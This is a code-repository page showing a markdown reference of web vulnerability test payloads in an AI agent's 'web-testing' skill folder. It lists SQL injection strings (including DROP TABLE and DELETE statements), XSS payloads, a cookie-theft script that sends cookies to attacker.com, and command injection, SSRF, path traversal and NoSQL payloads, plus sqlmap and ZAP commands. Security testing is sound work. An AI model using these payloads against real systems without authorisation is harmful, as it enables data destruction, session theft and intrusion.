renolation/english
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
main
english/.opencode/skills/web-testing/references/vulnerability-payloads.md
renolation 10d660cbcb init
2026-04-12 01:06:31 +07:00

1.3 KiB
Raw Permalink Blame History

Vulnerability Test Payloads

SQL Injection

Text Input

' OR '1'='1
' OR 1=1 --
'; DROP TABLE users; --
' UNION SELECT NULL, NULL --

Numeric Input

1 OR 1=1
1; DELETE FROM users; --

Blind (Time-based)

' OR SLEEP(5) --
' AND (SELECT(SLEEP(5)))a --

XSS (Cross-Site Scripting)

Reflected

<script>alert('XSS')</script>
<img src=x onerror=alert('XSS')>
<svg/onload=alert('XSS')>
"><script>alert('XSS')</script>

DOM-based

javascript:alert('XSS')
<iframe src="javascript:alert('XSS')"></iframe>

Cookie Theft

<script>fetch('http://attacker.com/?c='+document.cookie)</script>

NoSQL Injection (MongoDB)

{"$ne": null}
{"$gt": ""}
{"$regex": ".*"}
{"$where": "1==1"}

Command Injection

; ls -la
| whoami
`whoami`
$(whoami)

SSRF

http://localhost/admin
http://127.0.0.1/admin
http://169.254.169.254/  # AWS metadata

Path Traversal

../../../etc/passwd
..%2F..%2F..%2Fetc%2Fpasswd

CSRF Testing

  1. Submit form without CSRF token
  2. Reuse captured token multiple times
  3. Modify/remove token parameter

Testing Tools

# SQLMap
sqlmap -u "http://example.com/page?id=1" --dbs

# OWASP ZAP active scan
zap-cli active-scan http://example.com